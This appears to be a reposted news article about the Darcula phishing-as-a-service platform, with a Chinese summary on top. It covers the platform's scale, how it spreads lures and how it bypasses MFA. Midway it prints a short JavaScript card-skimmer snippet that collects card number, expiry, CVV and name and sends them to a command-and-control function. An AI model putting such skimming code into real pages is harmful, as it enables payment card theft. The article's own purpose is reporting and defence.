达库拉(PhaaS)盗取88.4万信用卡信息,全球用户点击量超1300万
安全研究人员发现了一个名为“Darcula”的大型钓鱼平台,该平台通过精心设计的网络钓鱼攻击窃取了约88.4万张信用卡信息,涉及全球32个国家,造成超1.5亿美元损失。该平台采用订阅制模式,提供逼真的网站复制品和SSL证书,并能绕过多因素认证,通过多渠道传播恶意链接,成为近年来最复杂的信用卡盗窃活动之一。 2025-5-6 08:49:17 Author: cybersecuritynews.com(查看原文) 阅读量:13 收藏

Darcula (PhaaS) Stolen 884,000 Credit Card Details on 13 Million Clicks from Users Worldwide

Security researchers have uncovered one of the largest credit card theft operations in recent history, with a sophisticated Phishing-as-a-Service (PhaaS) platform called “Darcula” responsible for stealing approximately 884,000 credit card details through a massive campaign that generated over 13 million clicks from unsuspecting users worldwide.

The operation, which began in late 2024, has targeted consumers across 32 countries, with the highest concentration of victims in North America and Europe.

Security experts estimate the financial damage could exceed $150 million based on current dark web values for stolen financial data.

Google News

The Darcula platform distinguishes itself from typical phishing operations through its advanced infrastructure and subscription-based model, allowing even low-skilled cybercriminals to launch sophisticated attacks.

The service provides customers with convincing replicas of banking websites, e-commerce platforms, and payment portals, complete with realistic SSL certificates and domain names designed to evade detection.

Most concerning is Darcula’s ability to bypass multi-factor authentication through real-time session hijacking techniques that intercept and relay authentication codes.

The massive campaign’s success stems from its multi-channel approach, delivering malicious links through email, SMS, social media messaging, and compromised advertising networks.

Victims typically receive urgent messages claiming issues with their accounts or purchases, directing them to fraudulent sites that capture their credentials and payment information.

The operation’s scale suggests a well-organized cybercriminal syndicate with significant resources and technical expertise behind it.

Mnemonic analysts identified the Darcula operation in February 2025 after tracing a pattern of credit card theft reported by financial institutions.

The researchers discovered a command-and-control infrastructure spanning multiple countries, with primary servers located in Eastern Europe and Southeast Asia.

“What makes Darcula particularly dangerous is its modular architecture and constant evolution,” explained Dr.

Elena Vasquez, lead cybersecurity researcher at Mnemonic. “The operators continuously update their techniques to evade detection.”

The most sophisticated aspect of Darcula is its advanced infection mechanism, which employs a multi-stage payload delivery system to evade security solutions.

Initial access

Initial access begins with seemingly innocuous JavaScript code embedded in fake payment pages:-

function validateInput() {
  // Legitimate-looking form validation
  collectCardData();
  // Hidden function that executes the actual theft
  setTimeout(function() {
    let exfiltrationPayload = {
      cardNum: document.getElementById('ccnumber').value,
      expDate: document.getElementById('expdate').value,
      cvv: document.getElementById('cvv').value,
      name: document.getElementById('cardholder').value
    };
    sendToC2(btoa(JSON.stringify(exfiltrationPayload)));
  }, 500);
  return true;
}

When users enter their information into these convincing forgeries, the JavaScript captures the data and encrypts it before transmission to intermediate servers.

These servers, often compromised legitimate websites, relay the information through a series of proxies before reaching Darcula’s secure storage infrastructure.

This multi-hop architecture makes attribution extremely difficult for law enforcement.

Financial institutions and cybersecurity companies have formed a joint task force to combat the Darcula threat.

They recommend organizations implement advanced phishing detection systems and conduct regular security awareness training for employees and customers.

Individuals should verify website authenticity through official channels before entering sensitive information and enable transaction notifications to quickly identify unauthorized charges.

Law enforcement agencies across multiple jurisdictions are coordinating efforts to track down the Darcula operators, though they acknowledge the sophisticated nature of the operation presents significant challenges to attribution and prosecution.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.


文章来源: https://cybersecuritynews.com/darcula-phaas-stolen-884000-credit-card-details/
如有侵权请联系:admin#unsafe.sh